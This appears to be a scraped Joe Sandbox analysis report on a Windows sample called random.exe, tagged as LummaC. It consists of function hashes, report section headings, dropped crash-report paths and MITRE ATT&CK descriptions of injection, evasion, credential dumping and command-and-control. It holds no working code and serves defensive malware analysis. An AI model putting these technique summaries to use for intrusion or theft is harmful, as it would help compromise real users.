Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f822273db6c68e011de364cdba3ced214ba853329870a82143a1b3826a5d9c10
Instruction ID: f2730a4bd8400e6ccca1806e7c2ae68197e714b3aafd468424d48539a12bf7a5
Opcode Fuzzy Hash: f822273db6c68e011de364cdba3ced214ba853329870a82143a1b3826a5d9c10
Instruction Fuzzy Hash: 963179221487538BDB148928C9911B7FB51EFB2360F18473FC492177C1EB38A929D3E9

Function 0040DFEA Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d451ddeb5618286ed8eacd871469a17d4232f0dfe3db3b93bda8811cc9b43ae3
Instruction ID: f14b1e3348f7832c914038d0d787e57ee05bed21178a428e04cc6a3a25562b9c
Opcode Fuzzy Hash: d451ddeb5618286ed8eacd871469a17d4232f0dfe3db3b93bda8811cc9b43ae3
Instruction Fuzzy Hash: 5A311474610601CFD719CF2AC990A3377A2FB8A310B248E69D5566BBE5D774EC21CB88

Function 0040DE72 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b56e36517da7a27e33ef45fdc150f204755ea86d778f10d59046157777f86f8c
Instruction ID: 57171615dec06f4b3ea34e7e1adccaef3f23bda716e905d6b8a786efa676c01b
Opcode Fuzzy Hash: b56e36517da7a27e33ef45fdc150f204755ea86d778f10d59046157777f86f8c
Instruction Fuzzy Hash: 8E318478B00502DFD318CF69DC40A327367FB86315B65863AE512A73E4DB74EC268A9D

Function 0043EB00 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7799af4de0b1a804fd633f699550772e22bf464a91c8aab1c1220e8e50eaa2f3
Instruction ID: f4efb102148d56746155fcf0a69e0a073b2616fb0f7bc1048f615d5ae5911f58
Opcode Fuzzy Hash: 7799af4de0b1a804fd633f699550772e22bf464a91c8aab1c1220e8e50eaa2f3
Instruction Fuzzy Hash: 7C2148719092108BE318CF1AC85576BFBA1EBC9328F19A52EE895573C0D37DDC418795

Function 00415C25 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 664478ecc493b7daad9ed5f4edac06f81c9f2eac4be26fbb9471f6581503d05a
Instruction ID: 3802dad517a1dce3a34934a6d2a34ff46c5f85f7b1ffb06216fa93cce7cae3e8
Opcode Fuzzy Hash: 664478ecc493b7daad9ed5f4edac06f81c9f2eac4be26fbb9471f6581503d05a
Instruction Fuzzy Hash: 53210774610B01CFD325CF29C84096677B2FF82314B19856DD0961BB76E734EC52CB88

Function 00402B20 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfaf8d0e94f5c6e15ea278469f7b2b102a292380ec2eac3b30e0d01d28b7b789
Instruction ID: 83086252303ea28528da4c30559dd3180df40622f01d3ae2d5ce96dbba8d640e
Opcode Fuzzy Hash: bfaf8d0e94f5c6e15ea278469f7b2b102a292380ec2eac3b30e0d01d28b7b789
Instruction Fuzzy Hash: 0311B43AB546214BE758DE51DCF963BB366E7C621071A013EDA87673C1CE70F902D254

Function 00440CD8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5026a4c9932bb01eb1cfa22389ce0795d21ac30bdbbfe162f59341988a769c1d
Instruction ID: b9fc61fbee827f6688f8a7aad0059ab2511ead888432829c4e3b88045a2d7ca2
Opcode Fuzzy Hash: 5026a4c9932bb01eb1cfa22389ce0795d21ac30bdbbfe162f59341988a769c1d
Instruction Fuzzy Hash: 4B11E77BB668328BD70CCB35C46057567D3BBA624435EC1BEC812D7298DF38981187C5

Function 00438AF0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 64260c404912ea7eadd8c0e068931427c058d1959da23024316477ca1ba720c8
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 83112933A052D10EC3128D3C8410565FFA30EA7234F29939EF4B49B2D2DA269D8B8359

Function 0042B430 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f053cbb5fb3d7dc403b9872d41e17036f9bd54e3a02cbcbb3c617f8fe574da9e
Instruction ID: 9ac58ec8d4b3439cda35f7244ec872c65e6fe70fd35cd3954e032617cd07918a
Opcode Fuzzy Hash: f053cbb5fb3d7dc403b9872d41e17036f9bd54e3a02cbcbb3c617f8fe574da9e
Instruction Fuzzy Hash: CD015EF1B017124BD620AE55E4C1727A3A8AB9070CF58453EE9049B343EB79FC1586DA

Function 0043EE10 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1731410d0e3cc220da59a8d1e9685258228a98747c5e126bdcfafed42aad0d04
Instruction ID: 8b14ff6e9f909d0a458ac4e63c91713bd7563fb29c01f731cd10e6b3bc0629ea
Opcode Fuzzy Hash: 1731410d0e3cc220da59a8d1e9685258228a98747c5e126bdcfafed42aad0d04
Instruction Fuzzy Hash: EDF0F935500208BBD2204B079C41D37736EFB9E768F101329F525232E1E362ED2187E9

Function 0041DEB0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: 678eaee0e22883ac7a801a5a92a95a4c58884562fe07dcc7c3908c64aa7d63e3
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: 5AD0A7B1948BB10E57588D3804E04B7FBE8EA47613B18159FE4D2E7205D224DC41469C

Function 00440310 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b7598ff860c6c584cc28cc9e2ee4f827b81178b3db001d57e5e8ec4a7167bec
Instruction ID: 776a1f7dd0c074e79f55533e911544892ec85f46c384d1e8a4e462c15b4e92e9
Opcode Fuzzy Hash: 9b7598ff860c6c584cc28cc9e2ee4f827b81178b3db001d57e5e8ec4a7167bec
Instruction Fuzzy Hash: 97D022B86481003B0248CB09CC4AE33B77CC387200F002034BE05C3350C610EC2182EE

Function 0042912D Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 89COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,FF5DFD53,0000001E,00000000,00000000,0=), ref: 004291F6

Strings

0=, xrefs: 004291EA
0=, xrefs: 00429160
ER, xrefs: 00429152
P&, xrefs: 0042914B

Memory Dump Source

Source File: 00000001.00000002.2152589048.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_random.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 0=$0=$ER$P&
API String ID: 237503144-76498936
Opcode ID: d0c15af12cbfad86f6864dd0905774a4f0b166c0b463e71c1bc931c37c03ad9b
Instruction ID: a2bc4232f0b587c6731111968c4b9dfd6b547f1d994af41bba96082cdda02b35
Opcode Fuzzy Hash: d0c15af12cbfad86f6864dd0905774a4f0b166c0b463e71c1bc931c37c03ad9b
Instruction Fuzzy Hash: 5E31A074A08B518FD7718F28D84036BBBF2FB85710F149E2DC4A69BB91D775A8428F84

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report random.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_random.exe_57a172f3aff707b514fc1dd5c6b6bfcd5ec5798_2a7bfe58_e621bb6a-867a-4fda-b943-41f888579ae9\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE46B.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE518.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE538.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
random.exe

Function 02A47F25 Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Function 02A480A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Function 028327A0 Relevance: 1.7, APIs: 1, Instructions: 240
COMMON

Function 02832028 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Function 0043B7B0 Relevance: 23.6, APIs: 11, Strings: 2, Instructions: 851
memorycomCOMMON

Function 00423E44 Relevance: 19.7, APIs: 1, Strings: 10, Instructions: 429
COMMON

Function 00436590 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 128
COMMON

Function 00408740 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 228
threadCOMMON

Function 0040D690 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 329
COMMON

Function 00420440 Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Function 0042DEE5 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 437
COMMON

Function 0042ECD0 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 370
COMMON

Function 0040CB44 Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Function 00410446 Relevance: 2.4, APIs: 1, Instructions: 941
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre